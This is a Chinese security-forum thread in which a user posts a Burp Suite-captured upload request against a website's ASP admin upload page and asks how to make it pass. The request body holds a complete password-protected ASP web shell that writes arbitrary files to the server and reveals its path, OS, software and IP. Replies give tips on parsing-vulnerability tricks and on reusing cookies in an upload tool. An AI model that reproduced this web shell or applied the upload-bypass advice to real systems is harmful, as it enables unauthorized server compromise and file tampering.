查看: 3749|回复: 8

burpsuite上传遇到问题求助

[复制链接]
  • TA的每日心情
    难过
    2017-9-9 10:24
  • 签到天数: 79 天

    [LV.6]常住居民II

    发表于 2015-11-1 17:58:30 | 显示全部楼层 |阅读模式
    本帖最后由 旧旧 于 2015-11-1 18:00 编辑

    用burp抓的包,但是filename=“”这边有点乱码了,不知道怎么办
    还有一个问题就是这个数据包怎么修改才能正常上传




    POST /admin/upfile_yqhy.asp HTTP/1.1
    Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
    Referer: http://www.          com/admin/picture_ymqy.asp
    Accept-Language: zh-cn
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
    Content-Type: multipart/form-data; boundary=---------------------------7df30d10101ae
    Accept-Encoding: gzip, deflate
    Host: www.   com
    Content-Length: 1520
    Pragma: no-cache
    Cookie: zh_choose=n; ASPSESSIONIDCQBARSQC=OEDBJOMCIIPMOJNCADCONEKP

    -----------------------------7df30d10101ae
    Content-Disposition: form-data; name="file1"; filename="E:\1¤??°üò?\??±????í\?£??′ó?ࣨasp ??±?£?\[ó?á|2???è¥]aspD??í\3.jpg"
    Content-Type: text/plain

    <%
    on error resume next
    %>
    <%
      if request("pass")="g" then  '?ú?aDT???ü??
      session("pw")="go"
      end if
    %>
    <%if session("pw")<>"go" then %>
    <%="<center><br><form action='' method='post'>"%>
    <%="<input name='pass' type='password' size='10'> <input "%><%="type='submit' value='ó?á|2???è¥'></center>"%>
    <%else%>
    <%
    set fso=server.createobject("scripting.filesystemobject")
    path=request("path")
    if path<>"" then
    data=request("da")
    set da=fso.createtextfile(path,true)
    da.write data
    if err=0 then
    %>
    <%="yes"%>
    <%else%>
    <%="no"%>
    <%
    end if
    err.clear
    end if
    da.close
    %>
    <%set da=nothing%>
    <%set fos=nothing%>
    <%="<form action='' method=post>"%>
    <%="<input type=text name=path>"%>
    <%="<br>"%>
    <%="μ±?°???t?·??:"&server.mappath(request.servervariables("script_name"))%>
    <%="<br>"%>
    <%="2ù×÷?μí3?a:"&Request.ServerVariables("OS")%>
    <%="<br>"%>
    <%="WEB·t???÷°?±??a:"&Request.ServerVariables("SERVER_SOFTWARE")%>
    <%="<br>"%>
    <%="·t???÷μ?IP?a:"&Request.ServerVariables("LOCAL_ADDR")%>
    <%="<br>"%>
    <%=""%>
    <%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
    <%="<br>"%>
    <%="<input type=submit value=save>"%>
    <%="</form>"%>
    <%end if%>
    -----------------------------7df30d10101ae
    Content-Disposition: form-data; name="B1"

    é?′?
    -----------------------------7df30d10101ae--


    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2023-4-26 23:35
  • 签到天数: 237 天

    [LV.7]常住居民III

    发表于 2015-11-1 19:22:37 | 显示全部楼层
    3.jpg这个格式你怎么能拿。解析漏洞试试      
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2023-4-26 23:35
  • 签到天数: 237 天

    [LV.7]常住居民III

    发表于 2015-11-1 19:22:45 | 显示全部楼层
    3.jpg这个格式你怎么能拿。解析漏洞试试      

    点评

    3.gpg是没法解析,但是再把其中的代码一截代码再粘帖复制一次,利用了明小子那个综合上传的原理,但是我不知道怎么修改不知道在哪里粘帖复制  详情 回复 发表于 2015-11-1 19:37
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2017-9-9 10:24
  • 签到天数: 79 天

    [LV.6]常住居民II

     楼主| 发表于 2015-11-1 19:37:06 | 显示全部楼层
    蓝颜 发表于 2015-11-1 19:22
    3.jpg这个格式你怎么能拿。解析漏洞试试

    3.gpg是没法解析,但是再把其中的代码一截代码再粘帖复制一次,利用了明小子那个综合上传的原理,但是我不知道怎么修改不知道在哪里粘帖复制

    点评

    ,用抓包工具,抓到上传文件时的cookie,,复制,粘贴在明小子放cookie的地方,之后找到相应的上传格式,上传就可以了,你也可以审查元素来修改元素来上传,本地构造试试也可以。个人自认为可行的办法,  详情 回复 发表于 2015-11-2 19:57
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-11-1 23:08:35 | 显示全部楼层
    路径可能是中文才乱码

    点评

    那路径是中文这样上传能被解析吗  详情 回复 发表于 2015-11-2 22:03
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2020-3-29 08:03
  • 签到天数: 255 天

    [LV.8]以坛为家I

    发表于 2015-11-2 19:57:58 | 显示全部楼层
    旧旧 发表于 2015-11-1 19:37
    3.gpg是没法解析,但是再把其中的代码一截代码再粘帖复制一次,利用了明小子那个综合上传的原理,但是我不 ...

    ,用抓包工具,抓到上传文件时的cookie,,复制,粘贴在明小子放cookie的地方,之后找到相应的上传格式,上传就可以了,你也可以审查元素来修改元素来上传,本地构造试试也可以。个人自认为可行的办法,

    点评

    明小子上传不行,上传不了  详情 回复 发表于 2015-11-2 21:26
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2017-9-9 10:24
  • 签到天数: 79 天

    [LV.6]常住居民II

     楼主| 发表于 2015-11-2 21:26:49 | 显示全部楼层
    LiFi 发表于 2015-11-2 19:57
    ,用抓包工具,抓到上传文件时的cookie,,复制,粘贴在明小子放cookie的地方,之后找到相应的上传格式, ...

    明小子上传不行,上传不了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2017-9-9 10:24
  • 签到天数: 79 天

    [LV.6]常住居民II

     楼主| 发表于 2015-11-2 22:03:53 | 显示全部楼层
    90_ 发表于 2015-11-1 23:08
    路径可能是中文才乱码

    那路径是中文这样上传能被解析吗
    回复 支持 反对

    使用道具 举报

    头像被屏蔽
  • TA的每日心情
    慵懒
    2016-2-28 17:24
  • 签到天数: 72 天

    [LV.6]常住居民II

    发表于 2015-11-17 12:24:58 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 20:05 , Processed in 0.024432 second(s), 11 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部